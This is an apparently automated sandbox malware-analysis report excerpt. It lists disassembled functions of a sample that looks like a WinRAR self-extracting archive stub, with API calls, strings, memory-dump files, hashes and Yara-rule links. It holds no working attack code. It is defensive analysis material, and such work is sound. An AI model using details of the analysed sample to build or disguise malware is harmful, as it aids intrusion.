GetWindowRect.USER32(?,00000000), ref: 00819693
ShowWindow.USER32(?,00000005,00000000), ref: 0081972A
SetWindowTextW.USER32(?,00000000), ref: 00819732
ShowWindow.USER32(00000000,00000005), ref: 00819748

Strings

RarHtmlClassName, xrefs: 008196F4

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 3aeb8992a3424da2915a141fae491da93599639a07ac12c66898c5c2895993e4
Instruction ID: 751804499f9f3400cdc3d95d64200f482aaf65be7b461d76a4b2313486d40dc0
Opcode Fuzzy Hash: 3aeb8992a3424da2915a141fae491da93599639a07ac12c66898c5c2895993e4
Instruction Fuzzy Hash: B031C231008210EFDB119F64DC48BABBBACFF49711F014599FE89D6192CB74E994CB61

Function 0082BFB5 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0082BF79: _free.LIBCMT ref: 0082BFA2

_free.LIBCMT ref: 0082C003

Part of subcall function 008284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0082BFA7,00833958,00000000,00833958,00000000,?,0082BFCE,00833958,00000007,00833958,?,0082C3CB,00833958), ref: 008284F4
Part of subcall function 008284DE: GetLastError.KERNEL32(00833958,?,0082BFA7,00833958,00000000,00833958,00000000,?,0082BFCE,00833958,00000007,00833958,?,0082C3CB,00833958,00833958), ref: 00828506

_free.LIBCMT ref: 0082C00E
_free.LIBCMT ref: 0082C019
_free.LIBCMT ref: 0082C06D
_free.LIBCMT ref: 0082C078
_free.LIBCMT ref: 0082C083
_free.LIBCMT ref: 0082C08E

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
Instruction ID: 15cbb8018299150a5b764baf6382cfad54f18551f59782254f70db907b4b1b74
Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
Instruction Fuzzy Hash: 2D114D31542B24F6DA20BBB4DD06FCBB799FF04700F408894B699E6452DF74A9849A92

Function 008220CA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,008220C1,0081FB12), ref: 008220D8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 008220E6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008220FF
SetLastError.KERNEL32(00000000,?,008220C1,0081FB12), ref: 00822151

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 67e8ebca652f6da80d4856152785d21da70e3dcb3d15062d86523ba0b40846f7
Instruction ID: b4543cea78526ef6989658814dd5a64a96ba67b13d99e0d3b9748f544c32e4aa
Opcode Fuzzy Hash: 67e8ebca652f6da80d4856152785d21da70e3dcb3d15062d86523ba0b40846f7
Instruction Fuzzy Hash: 5201F732209B31BEB7642BB9BC8AA2A3B88FB617747210A29F710D51E0FF515DE1D144

Function 0081DC9A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

Strings

AcquireSRWLockExclusive, xrefs: 0081DCC9
KERNEL32.DLL, xrefs: 0081DCB4
ReleaseSRWLockExclusive, xrefs: 0081DCD9

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID:
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 0-1718035505
Opcode ID: 5d2a2b4a56c50af4f4373a11ebb156a1c587fe7d0fa9a14a3c0b841e91a5ed6b
Instruction ID: ab65c3a53785b93d077ef0118fae62d5965ea6bb32e9477f3d5cb0d8ced3b6f4
Opcode Fuzzy Hash: 5d2a2b4a56c50af4f4373a11ebb156a1c587fe7d0fa9a14a3c0b841e91a5ed6b
Instruction Fuzzy Hash: 5F01D1616417225B8F305EA4AC917E723DCFF81316320292AE901D7340EA91C8C1DAE4

Function 00810CBE Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 00810D0D

Part of subcall function 0080ACF5: GetVersionExW.KERNEL32(?), ref: 0080AD1A

LocalFileTimeToFileTime.KERNEL32(?,00810CB8), ref: 00810D31
FileTimeToSystemTime.KERNEL32(?,?), ref: 00810D47
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00810D56
SystemTimeToFileTime.KERNEL32(?,00810CB8), ref: 00810D64
SystemTimeToFileTime.KERNEL32(?,?), ref: 00810D72

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: f62de4368d721b9af37f118e894f32bbcff53e0bc06c86eb7a12b44c8e75beef
Instruction ID: 1c594c7c63a921c3eb22721f53fc642a504503f67a1d05fb342fb3cde6538036
Opcode Fuzzy Hash: f62de4368d721b9af37f118e894f32bbcff53e0bc06c86eb7a12b44c8e75beef
Instruction Fuzzy Hash: 0031C97A90020DEBCB04DFE5D8859EFBBBCFF58700B04456AE955E7210E7309685CB65

Function 008191B0 Relevance: 9.1, APIs: 6, Instructions: 89COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 008191D4
_memcmp.LIBVCRUNTIME ref: 008191EB

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 40912af7d8ded569e6d2ee8507ea79408a2469f366475c126918ede9fc8fcfe0
Instruction ID: 8265b78a155944899edbb821f267fc128c607d8f847c0b431c7b60e456cd7df6
Opcode Fuzzy Hash: 40912af7d8ded569e6d2ee8507ea79408a2469f366475c126918ede9fc8fcfe0
Instruction Fuzzy Hash: 41217F7160420EBBD7049B14DC91EBB77ADFF91788B108528FC59DB302E274EDC68692

Function 00828FA5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00840EE8,00823E14,00840EE8,?,?,00823713,00000050,?,00840EE8,00000200), ref: 00828FA9
_free.LIBCMT ref: 00828FDC
_free.LIBCMT ref: 00829004
SetLastError.KERNEL32(00000000,?,00840EE8,00000200), ref: 00829011
SetLastError.KERNEL32(00000000,?,00840EE8,00000200), ref: 0082901D
_abort.LIBCMT ref: 00829023

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 553710c277c04d6b8109c32cc630e107f654b76903454fd082b14c164cdf6727
Instruction ID: 26b8c1b3cc47286a2c19f3b498ecf4bc39e06b97896384479478d8e15f71f830
Opcode Fuzzy Hash: 553710c277c04d6b8109c32cc630e107f654b76903454fd082b14c164cdf6727
Instruction Fuzzy Hash: 72F0F435506A31EBCA25732C7D0AB2B2A5AFFE0760F250414F514E2292EF30C9C15416

Function 0081D2E6 Relevance: 9.0, APIs: 6, Instructions: 43windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 0081D2F2
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0081D30C
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0081D31D
TranslateMessage.USER32(?), ref: 0081D327
DispatchMessageW.USER32(?), ref: 0081D331
WaitForSingleObject.KERNEL32(?,0000000A), ref: 0081D33C

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: 47e90c9f90222330e0b3e09001416e1ea8c602fa098a5cbc987cde0801a4545c
Instruction ID: 4075bec9380cae376ebb189642ed3c4075b96fabc0d6f64de9e6ee794e773e75
Opcode Fuzzy Hash: 47e90c9f90222330e0b3e09001416e1ea8c602fa098a5cbc987cde0801a4545c
Instruction Fuzzy Hash: 5CF03C72A01A19BBCB216BA1EC4CEDBBF6DFF51391F008452F606D2150E6758581CBA2

Function 0081C40E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 0081C435

Part of subcall function 008117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0080BB05,00000000,.exe,?,?,00000800,?,?,008185DF,?), ref: 008117C2

Strings

MAX, xrefs: 0081C487
<, xrefs: 0081C41E
MIN, xrefs: 0081C4A3
HIDE, xrefs: 0081C474

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: CompareString_wcschr
String ID: <$HIDE$MAX$MIN
API String ID: 2548945186-3358265660
Opcode ID: cb2d10d5c55af575e8fdc1f949d8fb5ce6636e4e5bdbeb2f2509998f4c4f3561
Instruction ID: 40495ff53c8590ece7fd19b32a6bbab4522aee55b4c0e401b97d8e15206a8331
Opcode Fuzzy Hash: cb2d10d5c55af575e8fdc1f949d8fb5ce6636e4e5bdbeb2f2509998f4c4f3561
Instruction Fuzzy Hash: 4431AF7294421DAADF26DA98CC85EEB77BDFF54304F0040A6FA09D2190EBB49EC48A51

Function 0081ADED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 0081ADFD
GetObjectW.GDI32(00000000,00000018,?), ref: 0081AE22
DeleteObject.GDI32(00000000), ref: 0081AE54
DeleteObject.GDI32(00000000), ref: 0081AE77

Part of subcall function 00819E1C: FindResourceW.KERNEL32(0081AE4D,PNG,?,?,?,0081AE4D,00000066), ref: 00819E2E
Part of subcall function 00819E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0081AE4D,00000066), ref: 00819E46
Part of subcall function 00819E1C: LoadResource.KERNEL32(00000000,?,?,?,0081AE4D,00000066), ref: 00819E59
Part of subcall function 00819E1C: LockResource.KERNEL32(00000000,?,?,?,0081AE4D,00000066), ref: 00819E64

Strings

], xrefs: 0081AE2A

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
String ID: ]
API String ID: 142272564-3352871620
Opcode ID: dd31a5f83c5218669fea95dcae73b98bf2d17d8d3ed4cb25dcbedfa83224977c
Instruction ID: 78f66faa464c7a5c84962873fcc3b8a08f2749bafb48c8eea6c9b3b244c7a953
Opcode Fuzzy Hash: dd31a5f83c5218669fea95dcae73b98bf2d17d8d3ed4cb25dcbedfa83224977c
Instruction Fuzzy Hash: AA014036941A15A6C7106768EC15AFF7B7EFF81B02F080010FD40E7291DAB28C6582A3

Function 0081CC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 0080130B: GetDlgItem.USER32(00000000,00003021), ref: 0080134F
Part of subcall function 0080130B: SetWindowTextW.USER32(00000000,008335B4), ref: 00801365

EndDialog.USER32(?,00000001), ref: 0081CCDB
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0081CCF1
SetDlgItemTextW.USER32(?,00000066,?), ref: 0081CD05
SetDlgItemTextW.USER32(?,00000068), ref: 0081CD14

Strings

RENAMEDLG, xrefs: 0081CCA8

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 6ccc593fb556381a7fe62256373666d95aca8904dca22a9892f8743e2804ceda
Instruction ID: 30eb42c1363636bcdaec82d725766d7acfc42a86f4dcfb9fdcfcb277d5ece2a1
Opcode Fuzzy Hash: 6ccc593fb556381a7fe62256373666d95aca8904dca22a9892f8743e2804ceda
Instruction Fuzzy Hash: A10128322C47147AD5215F64AC09FE77B9DFF5A743F110410F345E20E0C6A6AD448BA6

Function 008275C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00827573,00000000,?,00827513,00000000,0083BAD8,0000000C,0082766A,00000000,00000002), ref: 008275E2
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 008275F5
FreeLibrary.KERNEL32(00000000,?,?,?,00827573,00000000,?,00827513,00000000,0083BAD8,0000000C,0082766A,00000000,00000002), ref: 00827618

Strings

mscoree.dll, xrefs: 008275DB
CorExitProcess, xrefs: 008275ED

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: c7af48f3b96218b1d123f974b73df8b30ff5bf0fc8b129ac4b21d4ec6725ffae
Instruction ID: 705e39bedb163fa2af9698e622cb27d2ac74c275cead5606a8277ebc7aa1a893
Opcode Fuzzy Hash: c7af48f3b96218b1d123f974b73df8b30ff5bf0fc8b129ac4b21d4ec6725ffae
Instruction Fuzzy Hash: 6FF04F30A18618BBDB159F99DC09B9EBFB9FF84712F004168F805E6250EF748A80CA94

Function 0080EB73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00810085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008100A0
Part of subcall function 00810085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0080EB86,Crypt32.dll,00000000,0080EC0A,?,?,0080EBEC,?,?,?), ref: 008100C2

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0080EB92
GetProcAddress.KERNEL32(008481C0,CryptUnprotectMemory), ref: 0080EBA2

Strings

CryptUnprotectMemory, xrefs: 0080EB98
CryptProtectMemory, xrefs: 0080EB8C
Crypt32.dll, xrefs: 0080EB7C

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 9f481e867d4dc5f9c157f9fd44577b35189ea41b4a1c96dad927b548692f93fa
Instruction ID: dbe0a65df478027e8db51fad23d8cfd2030b10128c89012514ec034da91ca0b4
Opcode Fuzzy Hash: 9f481e867d4dc5f9c157f9fd44577b35189ea41b4a1c96dad927b548692f93fa
Instruction Fuzzy Hash: 78E01A70900B41EEDB309B28DC18B42BEE4BB55711F048C5DA8A6E3280D6B9D5808B90

Function 00827DD9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00827E4B
_free.LIBCMT ref: 00827E6B

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: c7239e91dc4b8e75b7bd68620bf733a0b1c225514d91f35cd8ed0ac141abc930
Instruction ID: c9883b855f02373aca257f138796ba21a733f31b9a96e2b5ed18aa6d3c5d6859
Opcode Fuzzy Hash: c7239e91dc4b8e75b7bd68620bf733a0b1c225514d91f35cd8ed0ac141abc930
Instruction Fuzzy Hash: 5A41F336A003149BCB10DF79D881A9EB7B6FF84714B1645A8E915EB281EB30AD81CB81

Function 0082B610 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0082B619
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0082B63C

Part of subcall function 00828518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0082C13D,00000000,?,008267E2,?,00000008,?,008289AD,?,?,?), ref: 0082854A

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0082B662
_free.LIBCMT ref: 0082B675
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0082B684

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 3fff11926300d5982f6238d30aecbb543ad5dad5a651cbe7ab95dc391805d3dc
Instruction ID: 39abe5d3afb9b8447fd916ecf7df70b1f867235368526711d88627ac18f62c65
Opcode Fuzzy Hash: 3fff11926300d5982f6238d30aecbb543ad5dad5a651cbe7ab95dc391805d3dc
Instruction Fuzzy Hash: 2101B1A2A03225BF2721167A7C88C7B6B6DFED6BA13140628B904D2110DF618D41A1B0

Function 00829029 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00840EE8,00000200,0082895F,008258FE,?,?,?,?,0080D25E,?,033D1BF8,00000063,00000004,0080CFE0,?), ref: 0082902E
_free.LIBCMT ref: 00829063
_free.LIBCMT ref: 0082908A
SetLastError.KERNEL32(00000000,00833958,00000050,00840EE8), ref: 00829097
SetLastError.KERNEL32(00000000,00833958,00000050,00840EE8), ref: 008290A0

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

